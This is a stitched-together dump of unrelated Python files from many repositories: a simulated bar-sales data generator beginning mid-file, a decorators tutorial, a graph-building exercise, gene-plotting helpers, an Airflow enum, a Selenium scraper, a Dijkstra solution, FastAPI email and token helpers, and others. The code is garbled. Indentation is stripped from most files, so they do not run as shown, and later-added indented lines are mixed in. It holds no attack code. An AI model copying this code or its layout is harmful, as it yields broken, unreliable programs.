if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def addSuitableBeerToCustomers(self, beer):
""" Try to find customers who can like this beer """
for customer in self.customers:
if beer.canMatch(customer.habits):
customer.suitableBeers.append(beer)
customer.suitableBeers[len(customer.suitableBeers) - 1].rank = 3 + math.ceil(random.random() * 3)
def _try(self, o):
try:
return o.__dict__
except:
return str(o)
def to_JSON(self):
return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
separators=(',', ':')).replace(
'\n', '')
class Weather:
def __init__(self, temperature, humidity):
self.temperature = temperature
self.humidity = humidity
    def _try(self, o):  # scoping fix, as in Beer
        try:
            return o.__dict__
        except:
            return str(o)

    def to_JSON(self):
        return json.dumps(self, default=lambda o: self._try(o), sort_keys=True, indent=0,
                          separators=(',', ':')).replace('\n', '')
def generateBeers():
beers = [Beer(1, "Kasteel", "Triple", 11, "Belgian Pale Ale", "Blonde", "Belgium", 6),
Beer(2, "La Raoul", "", 6.5, "Lager", "Blond", "France", 3.6),
Beer(3, "Rochefort", "8", 9.2, "Abbaye", "Brown", "Belgium", 5.5),
Beer(4, "Bière du Corbeau", "", 9, "Belgian Pale Ale", "Blond", "Belgium", 5),
Beer(5, "Cuvée des Trolls", "Blonde", 7, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(6, "Orval", "Blonde", 7, "Abbaye", "Amber", "Belgium", 5),
Beer(7, "Brewdog", "Punk IPA", 5.6, "IPA", "Blond", "Scotland", 4.5),
Beer(8, "Westmalle", "Triple", 9.5, "Abbaye", "Blond", "Belgium", 5),
Beer(9, "Rince Cochon", "Blonde", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 4.5),
Beer(10, "Hinano", "", 5, "Lager", "Blond", "Polynesia", 4),
Beer(11, "La Levrette", "Blonde", 5, "Lager", "Blond", "France", 4.5),
Beer(12, "La Fée Torchette", "Blonde", 6.5, "Lager", "Blond", "France", 4.5),
Beer(13, "La Trappe", "Quadrupel", 10, "Belgian Pale Ale", "Amber", "Belgium", 5),
Beer(14, "Kwak", "", 8.4, "Belgian Pale Ale", "Amber", "Belgium", 5.5),
Beer(15, "Tripel Karmeliet", "", 8.4, "Belgian Pale Ale", "Blond", "Belgium", 5.3),
Beer(16, "Omnipollo", "Fatamorgana", 8, "IPA", "Amber", "Sweden", 6.5),
Beer(17, "Barbar", "Miel", 8, "Belgian Pale Ale", "Blond", "Belgium", 6.4),
Beer(18, "Iron Maiden", "Trooper", 4.7, "Extra Special Bitter", "Blond", "England", 4.6),
Beer(19, "Gulden", "Draak", 10.7, "Belgian Dark Ale", "Brown", "Belgium", 5.8),
Beer(20, "Delirium", "Tremens", 8.5, "Belgian Pale Ale", "Blond", "Belgium", 5.4),
Beer(21, "Chimay", "Bleue", 9, "Belgian Dark Ale", "Brown", "Belgium", 5.4),
Beer(22, "Angelus", "Blonde", 7, "Belgian Pale Ale", "Blond", "France", 4.8),
Beer(23, "Pietra", "", 6, "Lager", "Blond", "France", 3.8),
Beer(24, "Brewdog", "Nanny State", 0.5, "Alcool Free", "Blond", "Scotland", 3.8),
Beer(25, "La Chouffe", "Blonde", 8, "Belgian Pale Ale", "Blond", "Belgium", 4.6),
Beer(26, "Blue Moon", "White Ale", 5.4, "White", "White", "USA", 4.5),
Beer(27, "Rousse du Mont Blanc", "", 6.5, "Amber", "Amber", "France", 3.6),
Beer(28, "Rochefort", "10", 11.3, "Abbaye", "Brown", "Belgium", 6),
Beer(29, "Saint Bernardus", "Abt 12", 10, "Belgian Pale Ale", "Brown", "Belgium", 5)
]
return beers
def generateCustomers():
customers = []
for i in range(0, NB_CUSTOMERS):
name = Customer.generateName(i)
firstDate = Customer.generateFirstDate()
lastDate = Customer.generateLastDate()
averageUptakesPerDay = Customer.generateAverageUptakes()
habits = Customer.generateHabits()
amount = Customer.generateAmount()
ponderationDays = Customer.generatePonderations()
customers.append(
Customer(i, name[0], name[1], firstDate, lastDate, averageUptakesPerDay, habits, ponderationDays, amount)
)
return customers
def getTemperatureFactor(temperature):
if temperature < 5:
return 0.85
if temperature > 22:
return 2 - (22 / temperature) # [1.04 ; 1.35]
return 1
def getHumidityFactor(humidity):
if humidity < 0.7:
return 1.2
if humidity > 0.9:
return 0.8
return 1
def willCustomerComeThisDay(customer, weather, singleDateTime):
# dayPonderation = percent of chance the customer goes to the bar today
# get standard ponderation for this customer for today
chancesHeWillComeToday = customer.ponderationDays[singleDateTime.weekday()]
# let's add some random to our ponderation, between -0.2 and + 0.2
# dayPonderation += (-0.2 + math.ceil(random.random() * 0.4))
# dayPonderation = max(0, min(1, dayPonderation)) # just to ensure to get in [0, 1] only
# moderate ponderation with weather
    chancesHeWillComeToday *= getTemperatureFactor(weather.temperature)  # 0.85 ; 1 ; [1.04 ; 1.35]
chancesHeWillComeToday *= getHumidityFactor(weather.humidity) # 1.2 ; 1 ; 0.8
# random=[0.0, 1.0], so it's convenient to compare with chances the customer will come today
return random.random() < chancesHeWillComeToday
def generateUptakesFor1Customer(customer, weather, singleDateTime):
""" Generates all the uptakes of a customer, based on its habits """
if not willCustomerComeThisDay(customer, weather, singleDateTime):
return None
# generates a random number of uptakes, based on the user habits
nbUptakes = max(0, customer.averageUptakesPerDay + (-1 + math.ceil(random.random() * 2)))
# The further we are in the month, the lower money the customer have :/
nbUptakes *= round(math.sin(0.03 * singleDateTime.day + math.pi / 2), 4) # [1; 0.6]
nbSuitableBeers = len(customer.suitableBeers)
if nbSuitableBeers == 0:
return None
beers = []
while nbUptakes > 0:
# find a suitable beer for the customer
        beer = customer.suitableBeers[random.randrange(nbSuitableBeers)]  # uniform pick; ceil() almost never chose index 0
beers.append(beer.id)
nbUptakes = nbUptakes - 1
return Uptake(customer.id, beers)
def generateWeather(singleDateTime, averageHumidityPerMonth):
""" Generates aweather condition, based on the date """
currentAverage = averageHumidityPerMonth[singleDateTime.month - 1]
r = random.random()
h = round(currentAverage + (r / 10), 2)
t = math.ceil(-10 + ((1 - currentAverage) * (50 + 25 * r)))
return Weather(t, h)
def dateRange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + _td(n)
def lastDay():
today = _dt.now()
snowCampDay = _dt(2018, 1, 25)
if snowCampDay < today:
return today
return snowCampDay
def generateMonthsHumidity():
averageHumidityPerMonth = []
for m in range(0, 12):
averageHumidityPerMonth.append(math.fabs(math.sin((-6 + m) / 12)) + 0.4) # to get values between 0.4 and 1
return averageHumidityPerMonth
def generateData():
endDay = lastDay()
customers = generateCustomers()
beers = generateBeers()
bar = Bar(beers, customers)
# pre-compute an average humidity per month to speed-up computation of the weather conditions per day
averageHumidityPerMonth = generateMonthsHumidity()
# fill in each day from the opening of the bar with uptakes
for singleDateTime in dateRange(OPENING_DATE, endDay):
weather = generateWeather(singleDateTime, averageHumidityPerMonth)
dailyUptakes = DailyUptakes(weather, singleDateTime)
for customer in bar.customers:
if customer.registrationDate <= singleDateTime and customer.lastvisitDate >= singleDateTime:
uptakes = generateUptakesFor1Customer(customer, weather, singleDateTime)
            if uptakes is not None:
dailyUptakes.uptakes.append(uptakes)
customerUptakes = CustomerDailyUptakes(singleDateTime, uptakes.beersId)
customer.uptakes.append(customerUptakes)
bar.nbTotalUptakes += len(uptakes.beersId)
bar.dailyUptakes.append(dailyUptakes)
return bar
##############################################################################
NB_CUSTOMERS = 50
OPENING_DATE = _dt(2012, 1, 1)
LAST_DATE = lastDay()
monthPonderations = [7, 8, 8.5, 9, 10, 10, 8.5, 6.5, 10, 10, 10, 6]
""" Start data generation """
bar = generateData()
with open('./zenibar_history.json', 'w+') as fu:
fu.write(bar.to_JSON())
print(bar.nbTotalUptakes)
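# Hedged sanity check: reload the generated history and confirm that the
# per-day uptakes sum to nbTotalUptakes (field names follow the classes above).
with open('./zenibar_history.json') as fu:
    data = json.loads(fu.read())
assert data['nbTotalUptakes'] == sum(
    len(u['beersId']) for day in data['dailyUptakes'] for u in day['uptakes'])
print(len(data['customers']), 'customers,', data['nbTotalUptakes'], 'uptakes')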
# [end of file; author: gwennael.buchet@gmail.com]

# === FILE: /01_functions_are_objects.py (repo: zacniewski/Decorators_intro, no license) ===
def shout(word="yes"):
return word.capitalize()+"!"
print shout()
# outputs : 'Yes!'
# As an object, you can assign the function to a variable like any
# other object
scream = shout
# Notice we don't use parentheses: we are not calling the function, we are
# putting the function "shout" into the variable "scream".
# It means you can then call "shout" from "scream":
print scream()
# outputs : 'Yes!'
# More than that, it means you can remove the old name 'shout', and
# the function will still be accessible from 'scream'
del shout
try:
print shout()
except NameError, e:
print e
#outputs: "name 'shout' is not defined"
print scream()
# outputs: 'Yes!'
# [end of file; author: a.zacniewski@gmail.com]

# === FILE: /tutorial3/tutorial3.py (repo: petrLorenc/School-web-data-mining-tutorials, no license) ===
import nltk
import networkx as nx                # the code below uses the nx alias
import matplotlib.pyplot as plt      # needed for plt.figure()/plt.show()
from networkx.drawing.nx_agraph import graphviz_layout  # needs pygraphviz
# input text
text = None
with open('text.txt', 'r') as f:
text = f.read()
# process text and convert to a graph
sentences = [[t for t in nltk.word_tokenize(sentence)] for sentence in nltk.sent_tokenize(text)]
G=nx.Graph()
# G.add_node(...
# G.add_edge(...
# ...
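# One hedged way to fill in the placeholders above: a co-occurrence graph
# linking consecutive tokens within each sentence (the windowing choice is
# an assumption, not prescribed by the tutorial).
for sentence in sentences:
    for a, b in zip(sentence, sentence[1:]):
        G.add_edge(a, b)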
# visualise
plt.figure(figsize=(20,10))
pos = graphviz_layout(G, prog="fdp")
nx.draw(G, pos,
labels={v:str(v) for v in G},
cmap = plt.get_cmap("bwr"),
node_color=[G.degree(v) for v in G],
font_size=12
)
plt.show()
# write to GEXF
nx.write_gexf(G, "export.gexf")
# [end of file; author: petr.lorenc@firma.seznam.cz]

# === FILE: /src/_plotter.py (repo: phoenixding/cellar, MIT) ===
from typing import Optional, Union
import numpy as np
import plotly.express as px
from plotly.graph_objects import Figure
from anndata import AnnData
from .units import wrap
from . import reduce_dim_vis
from . import name_genes
COLORS = [
'#cc5151', '#51cccc', '#337f7f', '#8ecc51', '#7f3333', '#597f33', '#8e51cc',
'#59337f', '#ccad51', '#7f6c33', '#51cc70', '#337f46', '#5170cc', '#33467f',
'#cc51ad', '#7f336c', '#cc7f51', '#7f4f33', '#bccc51', '#757f33', '#60cc51',
'#3c7f33', '#51cc9e', '#337f62', '#519ecc', '#33627f', '#6051cc', '#3c337f'
]
def _find_gene_index(adata, gene):
if isinstance(gene, int):
        if gene >= adata.var.index.to_numpy().shape[0]:  # valid indices are 0..n-1
            raise ValueError("Index out of bounds.")
return gene
if not isinstance(gene, str):
raise ValueError("Incorrect gene format.")
if gene in adata.var.index.to_numpy():
return np.where(adata.var.index.to_numpy() == gene)[0]
if 'parsed_names' not in adata.var:
name_genes(adata)
if gene in adata.var['parsed_names'].to_numpy():
return np.where(adata.var['parsed_names'] == gene)[0]
if gene in adata.var['parsed_ids'].to_numpy():
return np.where(adata.var['parsed_ids'] == gene)[0]
return -1
def _plot_labels(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
has_labels = True
if 'labels' not in adata.obs:
has_labels = False
print("Labels not found. Plotting 2d embeddings.")
#raise ValueError("Labels not found in object.")
if 'x_emb_2d' not in adata.obsm:
print("2d embeddings not found.")
print("Running default visualization method.")
reduce_dim_vis(adata)
if has_labels:
color = adata.obs['labels'].to_numpy().astype(str)
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color if has_labels else None,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_gene(
adata: AnnData,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if gene is None:
raise ValueError("Please specify gene to plot.")
index = _find_gene_index(adata, gene)
if index == -1:
print("Gene not found.")
return
color = adata.X[:, index]
method = adata.uns['visualization_info_2d']['method']
fig = px.scatter(
x=adata.obsm['x_emb_2d'][:, 0],
y=adata.obsm['x_emb_2d'][:, 1],
color=color,
hover_data={'Cell': adata.obs.index.to_numpy()},
labels={
'x': f'{method}1',
'y': f'{method}2'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
if return_fig:
return fig
fig.show()
def _plot_scores(
adata: AnnData,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> Figure:
"""
Helper function for plot.
"""
if 'scores' not in adata.uns['cluster_info']:
raise ValueError("Scores not found in object.")
eval_method = adata.uns['cluster_info']['eval_method']
fig = px.line(
x=adata.uns['cluster_info']['n_clusters_used'],
y=adata.uns['cluster_info']['scores'],
labels={
'x': 'n_clusters',
'y': f'{eval_method} score'
},
title=adata.uns['dataset'] if show_title else None,
template='none'
)
    if return_fig:
        return fig  # the original had a bare `return_fig` and returned nothing
fig.show()
def plot(
x: AnnData,
by: Optional[str] = None,
gene: Optional[Union[str, int]] = None,
show_title: Optional[bool] = False,
return_fig: Optional[bool] = False
) -> None:
"""
Plotting functionality.
Parameters
__________
x: AnnData object containing the data matrix and the plot keys.
by: String specifying what to plot.
gene: Will be used only if by is None or by == 'gene'.
Specify the name of the gene for which to plot expression for.
Can be in ensembl format, gene name, or index. If name is
specified and names are not found in adata, then will run
name_genes, but will not save the names in the adata object.
show_title: Boolean specifying whether to show the name of the
dataset in the plot.
return_fig: Boolean specifying whether to return a fig object if
set to True, otherwise will plot immediately.
"""
# Validations
is_AnnData = isinstance(x, AnnData)
if not is_AnnData:
raise ValueError("Object not in AnnData format.")
if by == 'labels' or (by is None and gene is None):
return _plot_labels(x, show_title, return_fig)
elif by is None or by == 'gene':
return _plot_gene(x, gene, show_title, return_fig)
elif by == 'scores':
return _plot_scores(x, show_title, return_fig)
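# Hedged usage of plot(); `adata` is assumed to be an AnnData object on which
# a 2d embedding and clustering have already been computed, and the gene name
# 'CD8A' is illustrative:
#
# plot(adata)                            # cluster labels on the 2d embedding
# plot(adata, by='gene', gene='CD8A')    # expression overlay for one gene
# fig = plot(adata, by='scores', return_fig=True)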
# [end of file; author: euxhen_hasanaj@ymail.com]

# === FILE: /airflow/providers/google_vendor/googleads/v12/errors/types/campaign_feed_error.py (repo: ephraimbuddy/airflow, Apache-2.0/BSD-3-Clause/MIT) ===
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="airflow.providers.google_vendor.googleads.v12.errors",
marshal="google.ads.googleads.v12",
manifest={"CampaignFeedErrorEnum",},
)
class CampaignFeedErrorEnum(proto.Message):
r"""Container for enum describing possible campaign feed errors.
"""
class CampaignFeedError(proto.Enum):
r"""Enum describing possible campaign feed errors."""
UNSPECIFIED = 0
UNKNOWN = 1
FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE = 2
CANNOT_CREATE_FOR_REMOVED_FEED = 4
CANNOT_CREATE_ALREADY_EXISTING_CAMPAIGN_FEED = 5
CANNOT_MODIFY_REMOVED_CAMPAIGN_FEED = 6
INVALID_PLACEHOLDER_TYPE = 7
MISSING_FEEDMAPPING_FOR_PLACEHOLDER_TYPE = 8
NO_EXISTING_LOCATION_CUSTOMER_FEED = 9
LEGACY_FEED_TYPE_READ_ONLY = 10
__all__ = tuple(sorted(__protobuf__.manifest))
# [end of file; author: ephraimbuddy.noreply@github.com]

# === FILE: /Preparing data/odata_download.py (repo: saraheikonen/eutrophication-drivers, no license) ===
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 13:11:46 2021
@author: sarah
"""
from selenium import webdriver
from selenium.webdriver.support.ui import Select
import geopandas as gpd
import numpy as np
import os
# give paths to the catchment shapefile (basins_path), to chromedriver.exe, and to
# where the catchments with depth should be saved
basins_path = 'Y:/Dippa/Data/model_input/basins/lake_catchments'
chromedriver_path = 'Y:/Dippa/Koodi local/Download data/chromedriver'  # duplicated assignment removed
save_path = 'Y:/Dippa/Data/basins/lake_catchments_with_depth'
# if save path doesn't exist, create folder
if not os.path.exists(save_path):
os.makedirs(save_path)
def build_query(short_id, driver):
# open jarvirajapinta querybuilder
jarviapi_url = 'http://rajapinnat.ymparisto.fi/api/jarvirajapinta/1.0/ODataQueryBuilder/'
driver.get(jarviapi_url)
# select top 1 result from dropdown
element_top= Select(driver.find_element_by_id('top'))
element_top.select_by_value('1')
driver.implicitly_wait(5)
# select jarvi from dropdown menu
element_jarvi = Select(driver.find_element_by_id('entities'))
element_jarvi.select_by_value('0')
driver.implicitly_wait(5)
# add where-condition: short lake id
#driver.implicitly_wait(5)
driver.find_element_by_id('addCondition').click()
element_condition = Select(driver.find_element_by_class_name('property'))
element_condition.select_by_value('1')
driver.implicitly_wait(5)
# equals
element_equals = Select(driver.find_element_by_class_name('propertyFilter'))
element_equals.select_by_value('0')
driver.implicitly_wait(5)
# short id
driver.find_element_by_class_name('propertyFilterInput').send_keys(short_id)
#select columns: mean depth in meters
driver.find_element_by_id('addSelectCondition').click()
short_id = driver.find_element_by_id('selectcolumn_24')
short_id.click()
driver.implicitly_wait(5)
# search
search_button = driver.find_element_by_id('submitQuery')
search_button.click()
# get result
driver.implicitly_wait(5)
mean_depth = driver.find_element_by_xpath('/html/body/div/div[2]/table/tbody/tr/td').text
if len(mean_depth) > 0:
depth_value = float(mean_depth)
else:
depth_value = np.nan
# refresh page to start over
search_button = driver.find_element_by_id('clearQuery')
search_button.click()
return depth_value
def main(basins_path, chromedriver_path, save_path):
# prepare basins df
basins = gpd.read_file(basins_path)
# make a new field for shortened VPDTunnus
basins['VPDLyh'] = basins.apply(lambda x: x.VPDTunnus.split('_')[0], axis = 1)
# set up chromedriver
driver = webdriver.Chrome(executable_path=chromedriver_path)
    # call query function on actual df
basins.insert(5, 'mean_depth', np.nan)
basins.loc[:,'mean_depth'] = basins.apply(lambda x: build_query(x.VPDLyh, driver), axis = 1)
driver.close()
basins.to_file(save_path + '/basins_with_lake_depth.shp')
main(basins_path, chromedriver_path, save_path)
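# Hedged Selenium 4 port of the element lookups: the find_element_by_* helpers
# used above were removed in Selenium 4. Page structure is assumed unchanged.
#
# from selenium.webdriver.common.by import By
# from selenium.webdriver.chrome.service import Service
#
# driver = webdriver.Chrome(service=Service(chromedriver_path))
# element_top = Select(driver.find_element(By.ID, 'top'))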
# [end of file; author: saraheikonen.noreply@github.com]

# === FILE: /choieungi/boj/다익스트라_우선순위큐.py (repo: IgoAlgo/Problem-Solving, no license) ===
import heapq
import sys
input = sys.stdin.readline
INF = int(1e9)  # one billion stands in for infinity

# Read the number of nodes and the number of edges
n, m = map(int, input().split())
# Read the starting node number
start = int(input())
# Adjacency list holding the nodes connected to each node
graph = [[] for i in range(n + 1)]
# Initialize the shortest-distance table to infinity
distance = [INF] * (n + 1)

# Read every edge
for _ in range(m):
    a, b, c = map(int, input().split())
    # moving from node a to node b costs c
    graph[a].append((b, c))

def dijkstra(start):
    q = []
    # The shortest path to the start node is 0; push it onto the queue
    heapq.heappush(q, (0, start))
    distance[start] = 0
    while q:  # while the queue is not empty
        # Pop the node with the smallest tentative distance
        dist, now = heapq.heappop(q)
        # Skip nodes that have already been processed
        if distance[now] < dist:
            continue
        # Check the neighbors of the current node
        for i in graph[now]:
            cost = dist + i[1]
            # If going through the current node shortens the path to the neighbor
            if cost < distance[i[0]]:
                distance[i[0]] = cost
                heapq.heappush(q, (cost, i[0]))

# Run Dijkstra's algorithm
dijkstra(start)

# Print the shortest distance to every node
for i in range(1, n + 1):
    # Print INFINITY for unreachable nodes
    if distance[i] == INF:
        print("INFINITY")
    # Otherwise print the distance
    else:
        print(distance[i])
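# A worked example of the expected stdin format (n m, start, then m lines of
# "a b c"); the graph is illustrative and the distances below were computed by hand:
# 6 11
# 1
# 1 2 2
# 1 3 5
# 1 4 1
# 2 3 3
# 2 4 2
# 3 2 3
# 3 6 5
# 4 3 3
# 4 5 1
# 5 3 1
# 5 6 2
# Expected output, one line per node 1..6: 0 2 3 1 2 4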
# [end of file; author: choieungi@gm.gist.ac.kr]

# === FILE: /amplify/backend/function/awsamplifyauthstarte960f0db4/src/index.py (repo: BearTECH-Consulting-Inc/demo-phc-amplify-auth, MIT-0) ===
import json
def handler(event, context):
print('received event:')
print(event)
return {
'statusCode': 200,
'headers': {
'Access-Control-Allow-Headers': '*',
'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'OPTIONS,POST,GET'
},
'body': json.dumps('Hello from your new Amplify Python lambda!')
}
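# Hedged local smoke test of the handler; the event shape is illustrative,
# not the exact API Gateway payload:
if __name__ == "__main__":
    print(handler({"path": "/items", "httpMethod": "GET"}, None))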
# [end of file; author: cameron.hebert@opsguru.io]

# === FILE: /src/utils.py (repo: aydinmemis/blog_FastAPI, BSD-3-Clause) ===
import logging
from datetime import datetime, timedelta
from pathlib import Path
from typing import Optional
import emails
import jwt
from emails.template import JinjaTemplate
from jwt.exceptions import InvalidTokenError
from core import config
password_reset_jwt_subject = "preset"
def send_email(email_to: str, subject_template="", html_template="", environment={}):
assert config.EMAILS_ENABLED, "no provided configuration for email variables"
message = emails.Message(
subject=JinjaTemplate(subject_template),
html=JinjaTemplate(html_template),
mail_from=(config.EMAILS_FROM_NAME, config.EMAILS_FROM_EMAIL),
)
smtp_options = {"host": config.SMTP_HOST, "port": config.SMTP_PORT}
if config.SMTP_TLS:
smtp_options["tls"] = True
if config.SMTP_USER:
smtp_options["user"] = config.SMTP_USER
if config.SMTP_PASSWORD:
smtp_options["password"] = config.SMTP_PASSWORD
response = message.send(to=email_to, render=environment, smtp=smtp_options)
logging.info(f"send email result: {response}")
def send_test_email(email_to: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Test email"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "test_email.html") as f:
template_str = f.read()
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={"project_name": config.PROJECT_NAME, "email": email_to},
)
def send_reset_password_email(email_to: str, email: str, token: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - Password recovery for user {email}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "reset_password.html") as f:
template_str = f.read()
if hasattr(token, "decode"):
use_token = token.decode()
else:
use_token = token
server_host = config.SERVER_HOST
link = f"{server_host}/reset-password?token={use_token}"
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": email,
"email": email_to,
"valid_hours": config.EMAIL_RESET_TOKEN_EXPIRE_HOURS,
"link": link,
},
)
def send_new_account_email(email_to: str, username: str, password: str):
project_name = config.PROJECT_NAME
subject = f"{project_name} - New account for user {username}"
with open(Path(config.EMAIL_TEMPLATES_DIR) / "new_account.html") as f:
template_str = f.read()
link = config.SERVER_HOST
send_email(
email_to=email_to,
subject_template=subject,
html_template=template_str,
environment={
"project_name": config.PROJECT_NAME,
"username": username,
"password": password,
"email": email_to,
"link": link,
},
)
def generate_password_reset_token(email):
delta = timedelta(hours=config.EMAIL_RESET_TOKEN_EXPIRE_HOURS)
now = datetime.utcnow()
expires = now + delta
exp = expires.timestamp()
encoded_jwt = jwt.encode(
{"exp": exp, "nbf": now, "sub": password_reset_jwt_subject, "email": email},
config.SECRET_KEY,
algorithm="HS256",
)
return encoded_jwt
def verify_password_reset_token(token) -> Optional[str]:
try:
decoded_token = jwt.decode(token, config.SECRET_KEY, algorithms=["HS256"])
assert decoded_token["sub"] == password_reset_jwt_subject
return decoded_token["email"]
except InvalidTokenError:
return None
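# Hedged round-trip check of the token helpers; it assumes config.SECRET_KEY
# and EMAIL_RESET_TOKEN_EXPIRE_HOURS are configured, and the address is illustrative:
if __name__ == "__main__":
    token = generate_password_reset_token("user@example.com")
    assert verify_password_reset_token(token) == "user@example.com"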
# [end of file; author: socanime@gmail.com]

# === FILE: /terrascript/ultradns/d.py (repo: alanyee/python-terrascript, BSD-2-Clause/Python-2.0) ===
# terrascript/ultradns/d.py
# [end of file; author: ilon.sjogren@enplore.com]

# === FILE: /locallibrary/catalog/views.py (repo: KCK90/Project, no license) ===
from django.shortcuts import render
from django.http import HttpResponse  # needed so zdj() can return a response
import cv2  # required by zdj(); missing from the original imports
import csv
import pandas as pd
# Create your views here.
def post_list(request):
return render(request, 'post_list.html', {})
def koty(request):
print('About')
return render(request, 'koty.html', {})
def analiza(request):
return render(request, 'analiza.html', {})
def zdj(request):
original = cv2.imread("dog.jpg")
duplicate = cv2.imread("images/dog2.jpg")
if original.shape == duplicate.shape:
print("The images have same size and channels")
difference = cv2.subtract(original, duplicate)
b, g, r = cv2.split(difference)
if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:
print("The images are completely Equal")
cv2.imshow("Original", original)
cv2.imshow("Duplicate", duplicate)
cv2.waitKey(0)
cv2.destroyAllWindows()
# [end of file; author: KCK90.noreply@github.com]

# === FILE: /27-29-nov-2014/day1/stringiter2.py (repo: ver007/pythonjumpstart, no license) ===
# NOTE: Python 2 syntax (print statement); run with a Python 2 interpreter.
__author__ = 'ravi'
s = 'aeiou'
i = 1
for char in s:
print "{}".format(char*i)
i += 1
# [end of file; author: ravi@rootcap.in]

# === FILE: /Translation-stats/Translation-stats.py (repo: xuchkang171/BoD-Translation-Zh, no license) ===
import re, os, io
# Revise following two defines (language_code and r2g_path) before you start using this program.
# Two-letter codes, represents the target language of translation you're working on.
language_code = "zh" # Check https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes for yours.
# Path of your R2G folder (WITHOUT A BACKSLASH AT THE END)
# r2g_path = r"G:\SteamLibrary\steamapps\common\Return 2 Games"
r2g_path = os.path.abspath(os.path.join(os.getcwd(), os.pardir))  # This way, the script is expected to live in a
# subfolder of the Return 2 Games folder.
launcher_path = r2g_path + r"\lang_{}\launcher.utf8".format(language_code)
main_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_main.utf8".format(language_code)
cards_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_cards.utf8".format(language_code)
gossips_path = r2g_path + r"\bod_lang_{}_demo\bod_demo_gossips.utf8".format(language_code)
# translated_units: load ignore items from ignore.txt
def load_ignores_for(translated_units):
with open(r"ignore.txt") as f:
all_text = f.read().split("\n")
for index, line in enumerate(all_text):
if line.startswith("# "):
pass
elif not line:
pass
else:
translated_units.setdefault(index, re.escape(line))
return translated_units
script_line_re = r"^\w+\s*=\s*\"(.*?)(?<!\\)\"\s*(#.*)?"
# Made for simplified chinese and traditional chinese. Revise it if you're working on a translation for other language.
translated_units = {"wide character" : r"[^\x00-\xff]", # Contains all Chinese characters.
"color_mark_begin" : r"\\\^[a-zA-Z0-9]{6}",
"color_mark_end" : r"\\\^\^",
"foo_1" : r"\\m\d\.\d",
"space" : r"\s",
"icon_mark" : r"\\s[a-zA-Z]*[0-9]*[<>?:;=`]?",
"several characters" : r"[/+-=,.:?!>_%~()]|\\\"",
"carriage return mark" : r"\\n",
"variable mark" : r"\\\d",
"digit" : r"\d",
"empty" : r""}
translated_units = load_ignores_for(translated_units)
translated_text_re = "^({})+$".format("|".join(x for x in translated_units.values()))
print(translated_text_re)
s = re.compile(script_line_re)
t = re.compile(translated_text_re)
ignore_string_mark = "# Translator: Translated."
ignore = re.compile(re.escape(ignore_string_mark))
print("ignore = ", ignore)
translation_items_count_summary = 0
translated_items_count_summary = 0
file_log = ""
log = ""
def save_file_log(filename, content):
with io.open(filename, 'w', encoding='utf8') as f:
f.write(content)
for x in (launcher_path, main_path, cards_path, gossips_path):
print(x)
with open(x, encoding='utf-8') as f:
plain_text = f.read()
all_text = plain_text.split("\n")
file_log = list(all_text)
translation_items_count_in_file = 0
translated_items_count_in_file = 0
for index, line in enumerate(all_text):
script = ""
result = s.match(line)
try:
script = result.group(1)
except (IndexError, AttributeError):
file_log[index] = " " + file_log[index]
continue
translation_items_count_in_file += 1
if ignore.search(line) or t.match(script):
translated_items_count_in_file += 1
file_log[index] = "T " + file_log[index]
else:
file_log[index] = "N " + file_log[index]
print(script)
translated_items_count_in_file += len(re.findall(ignore_string_mark, plain_text))
log += "* {}: {}% ({}/{})\n".format(re.search(r"(?<=\\)\w*\\\w*\.utf8", x).group(0),
round(translated_items_count_in_file / \
translation_items_count_in_file * 100),
translated_items_count_in_file,
translation_items_count_in_file)
translation_items_count_summary += translation_items_count_in_file
translated_items_count_summary += translated_items_count_in_file
save_file_log(x + ".log", '\n'.join(file_log))
summary = "* Overall progress: {}% ({}/{})\n".format(
round(translated_items_count_summary / translation_items_count_summary * 100),
translated_items_count_summary, translation_items_count_summary)
log = summary + log
with open('Progress.txt', 'w') as f:
    f.write(log)
os.startfile("Progress.txt")
# [end of file; author: xuchkang171@gmail.com]

# === FILE: /acs/acs_ygh_occupied_households_lacking_plumbing/static.py (repo: domsmo/datausa-acs-bamboo-etl, no license) ===
DICT_RENAME = {
'B25048_002E': 'mea-0',
'B25048_003E': 'mea-1',
'B25048_002M': 'moe-0',
'B25048_003M': 'moe-1',
}
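# Hedged usage sketch: rename raw ACS variable codes to measure/MOE slots.
# The DataFrame name is illustrative.
# import pandas as pd
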